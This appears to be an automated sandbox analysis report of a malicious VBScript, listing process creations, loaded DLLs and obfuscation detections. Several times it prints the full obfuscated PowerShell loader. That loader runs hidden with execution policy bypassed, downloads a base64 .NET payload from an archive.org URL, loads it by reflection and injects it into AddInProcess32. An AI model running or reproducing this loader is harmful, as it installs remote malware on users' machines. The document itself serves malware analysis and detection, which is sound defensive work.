              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1'+'}ur'+'l '+'= {0}https:/'+'/ia600100'+'.us'+'.arch'+'iv'+'e.org'+'/24'+'/ite'+'ms/'+'d'+'eta'+'h-'+'no'+'t'+'e-v/De'+'tah'+'NoteV.tx'+'t'+'{0'+'}'+';{1}base6'+'4Content = (N'+'ew'+'-O'+'b'+'je'+'ct System.Net.'+'WebClie'+'nt).'+'Downlo'+'a'+'dStrin'+'g({'+'1}url);'+'{1}bi'+'n'+'aryCon'+'tent = [Sy'+'stem'+'.'+'Convert]::From'+'Bas'+'e'+'64'+'String'+'({'+'1}base64Cont'+'ent)'+';{1}'+'assembly = '+'['+'Refl'+'e'+'ction.Ass'+'embly]:'+':Load({'+'1}bin'+'aryCont'+'en'+'t'+');{1}typ'+'e ='+' '+'{1}a'+'s'+'s'+'em'+'bl'+'y.'+'GetT'+'yp'+'e('+'{0'+'}'+'RunPE.Home'+'{0'+'})'+';{'+'1'+'}meth'+'od = '+'{'+'1}'+'type.G'+'etM'+'eth'+'o'+'d({0}V'+'AI{0})'+';{'+'1}me'+'t'+'h'+'od.Invoke({'+'1}null, [object['+']]@'+'({0}'+'txt.k'+'ns'+'b/ve'+'d.2r.cdfd77'+'2bf9971'+'a39'+'3084'+'5d0'+'6'+'84'+'8c6436'+'-b'+'up//:spt'+'th{0} , '+'{0}desati'+'vado{0} , '+'{0}des'+'ativado{0} , {0'+'}desa'+'tivad'+'o{0},{0}AddInProcess'+'3'+'2'+'{0'+'},{0}{0}))') -f [cHar]39,[cHar]36) | iNVOKe-eXpRESSIoN"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1'+'}ur'+'l '+'= {0}https:/'+'/ia600100'+'.us'+'.arch'+'iv'+'e.org'+'/24'+'/ite'+'ms/'+'d'+'eta'+'h-'+'no'+'t'+'e-v/De'+'tah'+'NoteV.tx'+'t'+'{0'+'}'+';{1}base6'+'4Content = (N'+'ew'+'-O'+'b'+'je'+'ct System.Net.'+'WebClie'+'nt).'+'Downlo'+'a'+'dStrin'+'g({'+'1}url);'+'{1}bi'+'n'+'aryCon'+'tent = [Sy'+'stem'+'.'+'Convert]::From'+'Bas'+'e'+'64'+'String'+'({'+'1}base64Cont'+'ent)'+';{1}'+'assembly = '+'['+'Refl'+'e'+'ction.Ass'+'embly]:'+':Load({'+'1}bin'+'aryCont'+'en'+'t'+');{1}typ'+'e ='+' '+'{1}a'+'s'+'s'+'em'+'bl'+'y.'+'GetT'+'yp'+'e('+'{0'+'}'+'RunPE.Home'+'{0'+'})'+';{'+'1'+'}meth'+'od = '+'{'+'1}'+'type.G'+'etM'+'eth'+'o'+'d({0}V'+'AI{0})'+';{'+'1}me'+'t'+'h'+'od.Invoke({'+'1}null, [object['+']]@'+'({0}'+'txt.k'+'ns'+'b/ve'+'d.2r.cdfd77'+'2bf9971'+'a39'+'3084'+'5d0'+'6'+'84'+'8c6436'+'-b'+'up//:spt'+'th{0} , '+'{0}desati'+'vado{0} , '+'{0}des'+'ativado{0} , {0'+'}desa'+'tivad'+'o{0},{0}AddInProcess'+'3'+'2'+'{0'+'},{0}{0}))') -f [cHar]39,[cHar]36) | iNVOKe-eXpRESSIoN"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbmm source: powershell.exe, 00000006.00000002.1417277961.00000217AB776000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.1417277961.00000217AB706000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.1417277961.00000217AB6C0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb1nr source: powershell.exe, 00000006.00000002.1417277961.00000217AB776000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1422770948.00000217AB970000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbL source: powershell.exe, 00000006.00000002.1417277961.00000217AB706000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000006.00000002.1423540417.00000217ABD20000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1400827922.00000217A46CD000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM", "0", "false");
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
              Obfuscated command line found
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1'+'}ur'+'l '+'= {0}https:/'+'/ia600100'+'.us'+'.arch'+'iv'+'e.org'+'/24'+'/ite'+'ms/'+'d'+'eta'+'h-'+'no'+'t'+'e-v/De'+'tah'+'NoteV.tx'+'t'+'{0'+'}'+';{1}base6'+'4Content = (N'+'ew'+'-O'+'b'+'je'+'ct System.Net.'+'WebClie'+'nt).'+'Downlo'+'a'+'dStrin'+'g({'+'1}url);'+'{1}bi'+'n'+'aryCon'+'tent = [Sy'+'stem'+'.'+'Convert]::From'+'Bas'+'e'+'64'+'String'+'({'+'1}base64Cont'+'ent)'+';{1}'+'assembly = '+'['+'Refl'+'e'+'ction.Ass'+'embly]:'+':Load({'+'1}bin'+'aryCont'+'en'+'t'+');{1}typ'+'e ='+' '+'{1}a'+'s'+'s'+'em'+'bl'+'y.'+'GetT'+'yp'+'e('+'{0'+'}'+'RunPE.Home'+'{0'+'})'+';{'+'1'+'}meth'+'od = '+'{'+'1}'+'type.G'+'etM'+'eth'+'o'+'d({0}V'+'AI{0})'+';{'+'1}me'+'t'+'h'+'od.Invoke({'+'1}null, [object['+']]@'+'({0}'+'txt.k'+'ns'+'b/ve'+'d.2r.cdfd77'+'2bf9971'+'a39'+'3084'+'5d0'+'6'+'84'+'8c6436'+'-b'+'up//:spt'+'th{0} , '+'{0}desati'+'vado{0} , '+'{0}des'+'ativado{0} , {0'+'}desa'+'tivad'+'o{0},{0}AddInProcess'+'3'+'2'+'{0'+'},{0}{0}))') -f [cHar]39,[cHar]36) | iNVOKe-eXpRESSIoN"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1'+'}ur'+'l '+'= {0}https:/'+'/ia600100'+'.us'+'.arch'+'iv'+'e.org'+'/24'+'/ite'+'ms/'+'d'+'eta'+'h-'+'no'+'t'+'e-v/De'+'tah'+'NoteV.tx'+'t'+'{0'+'}'+';{1}base6'+'4Content = (N'+'ew'+'-O'+'b'+'je'+'ct System.Net.'+'WebClie'+'nt).'+'Downlo'+'a'+'dStrin'+'g({'+'1}url);'+'{1}bi'+'n'+'aryCon'+'tent = [Sy'+'stem'+'.'+'Convert]::From'+'Bas'+'e'+'64'+'String'+'({'+'1}base64Cont'+'ent)'+';{1}'+'assembly = '+'['+'Refl'+'e'+'ction.Ass'+'embly]:'+':Load({'+'1}bin'+'aryCont'+'en'+'t'+');{1}typ'+'e ='+' '+'{1}a'+'s'+'s'+'em'+'bl'+'y.'+'GetT'+'yp'+'e('+'{0'+'}'+'RunPE.Home'+'{0'+'})'+';{'+'1'+'}meth'+'od = '+'{'+'1}'+'type.G'+'etM'+'eth'+'o'+'d({0}V'+'AI{0})'+';{'+'1}me'+'t'+'h'+'od.Invoke({'+'1}null, [object['+']]@'+'({0}'+'txt.k'+'ns'+'b/ve'+'d.2r.cdfd77'+'2bf9971'+'a39'+'3084'+'5d0'+'6'+'84'+'8c6436'+'-b'+'up//:spt'+'th{0} , '+'{0}desati'+'vado{0} , '+'{0}des'+'ativado{0} , {0'+'}desa'+'tivad'+'o{0},{0}AddInProcess'+'3'+'2'+'{0'+'},{0}{0}))') -f [cHar]39,[cHar]36) | iNVOKe-eXpRESSIoN"Jump to behavior
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc